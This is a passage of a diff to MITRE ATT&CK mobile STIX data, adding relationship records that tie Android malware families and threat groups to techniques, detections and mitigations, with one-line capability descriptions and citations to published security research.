"2022-03-30T19:52:05.143Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--0cdd66ad-26ac-4338-a764-4972a1e17ee3", + "target_ref": "attack-pattern--0d4e3bbb-7af5-4c88-a215-0c0906bc1e8d", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--f6770c26-ae93-468d-acaa-ab4ffea0e047", + "type": "relationship", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "url": "https://researchcenter.paloaltonetworks.com/2017/07/unit42-spydealer-android-trojan-spying-40-apps/", + "description": "Wenjun Hu, Cong Zheng and Zhi Xu. (2017, July 6). SpyDealer: Android Trojan Spying on More Than 40 Apps. 
Retrieved September 18, 2018.", + "source_name": "PaloAlto-SpyDealer" + } + ], + "modified": "2019-08-09T17:56:05.682Z", + "description": "[SpyDealer](https://attack.mitre.org/software/S0324) can record phone calls and surrounding audio.(Citation: PaloAlto-SpyDealer)", + "relationship_type": "uses", + "source_ref": "malware--86fc6f0c-86d9-473e-89f3-f50f3cb9319b", + "target_ref": "attack-pattern--6683aa0c-d98a-4f5b-ac57-ca7e9934a760", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--e8c833ee-4c7d-45a2-b29b-187fe3661c0d", + "created": "2020-12-17T20:15:22.496Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Palo Alto HenBox", + "description": "A. Hinchliffe, M. Harbison, J. Miller-Osborn, et al. (2018, March 13). HenBox: The Chickens Come Home to Roost. Retrieved September 9, 2019.", + "url": "https://unit42.paloaltonetworks.com/unit42-henbox-chickens-come-home-roost/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T19:55:35.453Z", + "description": "[HenBox](https://attack.mitre.org/software/S0544) can access the device’s contact list.(Citation: Palo Alto HenBox)", + "relationship_type": "uses", + "source_ref": "malware--aef537ba-10c2-40ed-a57a-80b8508aada4", + "target_ref": "attack-pattern--e0b9ecb8-a7d1-43c7-aa30-8e19c6a92c86", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--c49cdcb7-3cb8-40ed-a745-0cebad20b1fd", + "type": "relationship", + "created": "2020-05-04T14:04:56.214Z", + "created_by_ref": 
"identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Google Bread", + "url": "https://security.googleblog.com/2020/01/pha-family-highlights-bread-and-friends.html", + "description": "A. Guertin, V. Kotov, Android Security & Privacy Team. (2020, January 9). PHA Family Highlights: Bread (and Friends) . Retrieved April 27, 2020." + } + ], + "modified": "2020-05-04T15:40:21.076Z", + "description": "[Bread](https://attack.mitre.org/software/S0432) has used native code in an attempt to disguise malicious functionality.(Citation: Google Bread)", + "relationship_type": "uses", + "source_ref": "malware--108b2817-bc01-404e-8e1b-8cdeec846326", + "target_ref": "attack-pattern--52eff1c7-dd30-4121-b762-24ae6fa61bbb", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--57e441f8-6799-4d1b-8e2a-13d8ac1c8e78", + "created": "2023-02-28T20:37:59.846Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "proofpoint_flubot_0421", + "description": "Crista Giering, F. Naves, Andrew Conway, Adam McNeil . (2021, April 27). FluBot Android Malware Spreading Rapidly Through Europe, May Hit U.S. Soon. 
Retrieved February 28, 2023.", + "url": "https://www.proofpoint.com/us/blog/threat-insight/flubot-android-malware-spreading-rapidly-through-europe-may-hit-us-soon" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-31T22:08:37.122Z", + "description": "[FluBot](https://attack.mitre.org/software/S1067) can obfuscated class, string, and method names in newer malware versions.(Citation: proofpoint_flubot_0421)", + "relationship_type": "uses", + "source_ref": "malware--f5ff006c-702f-4ded-8e60-ca6c540d91bc", + "target_ref": "attack-pattern--d13fa042-8f26-44e1-a2a8-af0bf8e2ac9a", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--bee6407a-1f05-4f91-b6e7-a8f8b58fa421", + "type": "relationship", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "CheckPoint-Charger", + "description": "Oren Koriat and Andrey Polkovnichenko. (2017, January 24). Charger Malware Calls and Raises the Risk on Google Play. Retrieved January 24, 2017.", + "url": "http://blog.checkpoint.com/2017/01/24/charger-malware/" + } + ], + "modified": "2019-10-09T14:51:42.827Z", + "description": "[Charger](https://attack.mitre.org/software/S0323) encodes strings into binary arrays to make it difficult to inspect them. 
It also loads code from encrypted resources dynamically and includes meaningless commands that mask the actual commands passing through.(Citation: CheckPoint-Charger)", + "relationship_type": "uses", + "source_ref": "malware--d1c600f8-0fb6-4367-921b-85b71947d950", + "target_ref": "attack-pattern--d13fa042-8f26-44e1-a2a8-af0bf8e2ac9a", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--b4735277-516a-4cd2-9607-a3e415945d93", + "type": "relationship", + "created": "2020-11-10T17:08:35.800Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout Uyghur Campaign", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. Retrieved November 10, 2020." 
+ } + ], + "modified": "2021-09-20T13:54:20.494Z", + "description": "[CarbonSteal](https://attack.mitre.org/software/S0529) can remotely capture device audio.(Citation: Lookout Uyghur Campaign)", + "relationship_type": "uses", + "source_ref": "malware--007ebf84-4e14-44c7-a5aa-151d5de85320", + "target_ref": "attack-pattern--6683aa0c-d98a-4f5b-ac57-ca7e9934a760", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--3565140f-1570-494d-9d6f-91c9203ece69", + "created": "2023-03-20T18:52:29.821Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:52:29.821Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--5ae32c6a-2d12-4b8f-81ca-f862f2be0962", + "target_ref": "attack-pattern--0d95940f-9583-4e0f-824c-a42c1be47fad", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--f65087b4-adf2-4292-a711-7ae829e91397", + "type": "relationship", + "created": "2019-09-04T14:28:16.385Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "description": "Bauer A., Kumar A., Hebeisen C., et al. (2019, July). Monokle: The Mobile Surveillance Tooling of the Special Technology Center. 
Retrieved September 4, 2019.", + "url": "https://www.lookout.com/documents/threat-reports/lookout-discovers-monokle-threat-report.pdf", + "source_name": "Lookout-Monokle" + } + ], + "modified": "2019-09-04T14:32:12.877Z", + "description": "[Monokle](https://attack.mitre.org/software/S0407) can list applications installed on the device.(Citation: Lookout-Monokle)", + "relationship_type": "uses", + "source_ref": "malware--6a7aaab1-3e0a-48bb-ba66-bbf7665c0a65", + "target_ref": "attack-pattern--198ce408-1470-45ee-b47f-7056050d4fc2", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--8c3296f6-3520-4d1b-8b57-bdd48a5aac91", + "created": "2020-12-18T20:14:47.369Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "WhiteOps TERRACOTTA", + "description": "Satori Threat Intelligence and Research Team. (2020, August). TERRACOTTA Android Malware: A Technical Study. 
Retrieved December 18, 2020.", + "url": "https://www.whiteops.com/blog/terracotta-android-malware-a-technical-study" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:48:00.045Z", + "description": "[TERRACOTTA](https://attack.mitre.org/software/S0545) has registered several broadcast receivers.(Citation: WhiteOps TERRACOTTA)", + "relationship_type": "uses", + "source_ref": "malware--e296b110-46d3-4f7a-894c-cc71ea50168c", + "target_ref": "attack-pattern--3775a580-a1d1-46c4-8147-c614a715f2e9", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--c6a32f64-3105-4a94-8172-28ac0e10dd93", + "created": "2023-03-20T18:21:59.396Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:21:59.396Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c", + "target_ref": "attack-pattern--6c49d50f-494d-4150-b774-a655022d20a6", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--75ed2348-279f-4485-97a3-9a5ada27d799", + "created": "2023-02-06T19:06:17.406Z", + "revoked": false, + "external_references": [ + { + "source_name": "lookout_abstractemu_1021", + "description": "P Shunk, K Balaam. (2021, October 28). Rooting Malware Makes a Comeback: Lookout Discovers Global Campaign. 
Retrieved February 6, 2023.", + "url": "https://www.lookout.com/blog/lookout-discovers-global-rooting-malware-campaign" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-02-06T19:06:17.406Z", + "description": "[AbstractEmu](https://attack.mitre.org/software/S1061) can disable Play Protect.(Citation: lookout_abstractemu_1021)", + "relationship_type": "uses", + "source_ref": "malware--2aec175b-4429-4048-8e09-3ef6cbecfc64", + "target_ref": "attack-pattern--2aa78dfd-cb6f-4c70-9408-137cfd96be49", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--80778a1e-715d-477b-87fa-e92181b31659", + "created": "2020-12-24T21:45:56.967Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Lookout Uyghur Campaign", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. 
Retrieved November 10, 2020.", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:15:22.472Z", + "description": "[SilkBean](https://attack.mitre.org/software/S0549) can delete various piece of device data, such as contacts, call logs, applications, SMS messages, email, plugins, and files in external storage.(Citation: Lookout Uyghur Campaign)", + "relationship_type": "uses", + "source_ref": "malware--ddbe5657-e21e-4a89-8221-2f1362d397ec", + "target_ref": "attack-pattern--ab7400b7-3476-4776-9545-ef3fa373de63", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--3b24a287-36e1-49b9-811d-c0080147ff57", + "created": "2023-03-20T18:41:47.754Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:41:47.754Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--685f917a-e95e-4ba0-ade1-c7d354dae6e0", + "target_ref": "attack-pattern--693cdbff-ea73-49c6-ac3f-91e7285c31d1", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--b6726136-3c20-4921-a0cb-75a66f59107c", + "type": "relationship", + "created": "2020-09-11T16:22:03.296Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Lookout ViperRAT", + "url": 
"https://blog.lookout.com/viperrat-mobile-apt", + "description": "M. Flossman. (2017, February 16). ViperRAT: The mobile APT targeting the Israeli Defense Force that should be on your radar. Retrieved September 11, 2020." + } + ], + "modified": "2020-09-11T16:22:03.296Z", + "description": "[ViperRAT](https://attack.mitre.org/software/S0506) can collect network configuration data from the device, including phone number, SIM operator, and network operator.(Citation: Lookout ViperRAT)", + "relationship_type": "uses", + "source_ref": "malware--f666e17c-b290-43b3-8947-b96bd5148fbb", + "target_ref": "attack-pattern--d4536441-1bcc-49fa-80ae-a596ed3f7ffd", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--f947d845-4d70-41f3-ae3c-18ea8b44e667", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "ArsTechnica-HummingBad", + "description": "Dan Goodin. (2016, July 7). 10 million Android phones infected by all-powerful auto-rooting apps. 
Retrieved January 24, 2017.", + "url": "http://arstechnica.com/security/2016/07/virulent-auto-rooting-malware-takes-control-of-10-million-android-devices/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-21T18:51:23.251Z", + "description": "[HummingBad](https://attack.mitre.org/software/S0322) can create fraudulent statistics inside the official Google Play Store, and has generated revenue from installing fraudulent apps and displaying malicious advertisements.(Citation: ArsTechnica-HummingBad)", + "relationship_type": "uses", + "source_ref": "malware--c8770c81-c29f-40d2-a140-38544206b2b4", + "target_ref": "attack-pattern--a8e971b8-8dc7-4514-8249-ae95427ec467", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--57a069a0-399f-43ab-9efc-50432a41b26b", + "created": "2020-12-24T21:55:56.743Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Lookout Uyghur Campaign", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. 
Retrieved November 10, 2020.", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:36:12.585Z", + "description": "[DoubleAgent](https://attack.mitre.org/software/S0550) has deleted or renamed specific files.(Citation: Lookout Uyghur Campaign)", + "relationship_type": "uses", + "source_ref": "malware--3d6c4389-3489-40a3-beda-c56e650b6f68", + "target_ref": "attack-pattern--ab7400b7-3476-4776-9545-ef3fa373de63", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--7fe8ab9f-b207-4c39-ab5c-e929a1c949f9", + "created": "2019-07-16T14:33:12.113Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "Krebs-Triada June 2019", + "url": "https://krebsonsecurity.com/2019/06/tracing-the-supply-chain-attack-on-android-2/", + "description": "Krebs, B. (2019, June 25). Tracing the Supply Chain Attack on Android. Retrieved July 16, 2019." + }, + { + "source_name": "Google Triada June 2019", + "url": "https://security.googleblog.com/2019/06/pha-family-highlights-triada.html", + "description": "Lukasz Siewierski. (2019, June 6). PHA Family Highlights: Triada. Retrieved July 16, 2019." 
+ } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[Triada](https://attack.mitre.org/software/S0424) was added into the Android system by a third-party vendor identified as Yehuo or Blazefire during the production process.(Citation: Google Triada June 2019)(Citation: Krebs-Triada June 2019)", + "modified": "2022-04-19T15:47:32.152Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "uses", + "source_ref": "malware--f082fc59-0317-49cf-971f-a1b6296ebb52", + "target_ref": "attack-pattern--9558a84e-2d5e-4872-918e-d847494a8ffc", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--cd9e8334-2ff6-4f64-993f-4e11a68ef7ca", + "created": "2023-03-20T18:58:19.895Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:58:19.895Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--bf0ff551-a5a7-40e5-bff9-f9405011b1f4", + "target_ref": "attack-pattern--9ef05e3d-52db-4c12-be4f-519214bbe91f", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--bbc6308e-f7f6-40c7-80cb-f760d623c8af", + "created": "2023-01-18T21:20:01.333Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "nccgroup_sharkbot_0322", + "description": "RIFT: Research and Intelligence Fusion Team. (2022, March 3). SharkBot: a “new” generation Android banking Trojan being distributed on Google Play Store. 
Retrieved January 18, 2023.", + "url": "https://research.nccgroup.com/2022/03/03/sharkbot-a-new-generation-android-banking-trojan-being-distributed-on-google-play-store/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-27T18:56:41.614Z", + "description": "[SharkBot](https://attack.mitre.org/software/S1055) can use HTTP to send C2 messages to infected devices.(Citation: nccgroup_sharkbot_0322)", + "relationship_type": "uses", + "source_ref": "malware--9cd72f5c-bec0-4f7e-bb6d-296937116291", + "target_ref": "attack-pattern--2282a98b-5049-4f61-9381-55baca7c1add", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--035192e3-94f4-426d-9be9-312ddd1ce6a8", + "created": "2019-11-21T16:42:48.437Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "SecureList - ViceLeaker 2019", + "description": "GReAT. (2019, June 26). ViceLeaker Operation: mobile espionage targeting Middle East. 
Retrieved November 21, 2019.", + "url": "https://securelist.com/fanning-the-flames-viceleaker-operation/90877/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:22:18.013Z", + "description": "[ViceLeaker](https://attack.mitre.org/software/S0418) can collect SMS messages.(Citation: SecureList - ViceLeaker 2019)", + "relationship_type": "uses", + "source_ref": "malware--6fcaf9b0-b509-4644-9f93-556222c81ed2", + "target_ref": "attack-pattern--c6421411-ae61-42bb-9098-73fddb315002", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--891edea2-817c-4eeb-9991-b6e095c269a8", + "created": "2020-06-02T14:32:31.903Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Google Project Zero Insomnia", + "description": "I. Beer. (2019, August 29). Implant Teardown. 
Retrieved June 2, 2020.", + "url": "https://googleprojectzero.blogspot.com/2019/08/implant-teardown.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T17:40:06.957Z", + "description": "[INSOMNIA](https://attack.mitre.org/software/S0463) can retrieve the call history.(Citation: Google Project Zero Insomnia)", + "relationship_type": "uses", + "source_ref": "malware--21b7e0b0-0dea-4ccc-8ad4-8da51fe3a901", + "target_ref": "attack-pattern--1d1b1558-c833-482e-aabb-d07ef6eae63d", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--d32003ba-959b-4377-aa04-f75275c32abf", + "created": "2019-07-16T14:33:12.144Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Google Triada June 2019", + "description": "Lukasz Siewierski. (2019, June 6). PHA Family Highlights: Triada. 
Retrieved July 16, 2019.", + "url": "https://security.googleblog.com/2019/06/pha-family-highlights-triada.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-05T20:40:27.131Z", + "description": "[Triada](https://attack.mitre.org/software/S0424) utilized HTTP to exfiltrate data through POST requests to the command and control server.(Citation: Google Triada June 2019) ", + "relationship_type": "uses", + "source_ref": "malware--f082fc59-0317-49cf-971f-a1b6296ebb52", + "target_ref": "attack-pattern--32063d7f-0a39-440d-a4a3-2694488f96cc", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--3ebdc17d-401e-4f6a-af51-2dc57437b817", + "created": "2019-09-20T18:03:57.062Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "Android 10 Execute", + "url": "https://developer.android.com/about/versions/10/behavior-changes-all#execute-permission", + "description": "Android Developers. (n.d.). Behavior changes: all apps - Removed execute permission for app home directory. Retrieved September 20, 2019." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "Applications that target Android API level 29 or higher cannot execute native code stored in the application's internal data storage directory, limiting the ability of applications to download and execute native code at runtime. 
(Citation: Android 10 Execute)", + "modified": "2022-04-01T18:37:44.516Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "mitigates", + "source_ref": "course-of-action--0beabf44-e8d8-4ae4-9122-ef56369a2564", + "target_ref": "attack-pattern--6c49d50f-494d-4150-b774-a655022d20a6", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--6ee69225-7c42-49e6-bfe4-c7009c82e76a", + "created": "2023-03-20T18:44:36.073Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:44:36.073Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--56c2b384-77f8-461f-a71a-76f7888ebfb6", + "target_ref": "attack-pattern--a8c31121-852b-46bd-9ba4-674ae5afe7ad", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--429a4b02-f774-4b1e-aaef-5fd9c654dd09", + "type": "relationship", + "created": "2021-02-08T16:36:20.846Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "BlackBerry Bahamut", + "url": "https://www.blackberry.com/us/en/pdfviewer?file=/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-spark-bahamut.pdf", + "description": "The BlackBerry Research & Intelligence Team. (2020, October). BAHAMUT: Hack-for-Hire Masters of Phishing, Fake News, and Fake Apps. Retrieved February 8, 2021." 
+ } + ], + "modified": "2021-05-24T13:16:56.596Z", + "description": "[Windshift](https://attack.mitre.org/groups/G0112) has exfiltrated local account data and calendar information as part of Operation ROCK.(Citation: BlackBerry Bahamut)", + "relationship_type": "uses", + "source_ref": "intrusion-set--afec6dc3-a18e-4b62-b1a4-5510e1a498d1", + "target_ref": "attack-pattern--e1c912a9-e305-434b-9172-8a6ce3ec9c4a", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--148703c5-6d07-439c-a4ff-d77119c70857", + "created": "2023-03-20T18:52:21.767Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-20T18:52:21.767Z", + "description": "", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--a7f22107-02e5-4982-9067-6625d4a1765a", + "target_ref": "attack-pattern--948a447c-d783-4ba0-8516-a64140fcacd5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--d886f368-a38b-4cb3-906f-9b284f58b369", + "type": "relationship", + "created": "2019-12-10T16:07:41.066Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "SecureList DVMap June 2017", + "url": 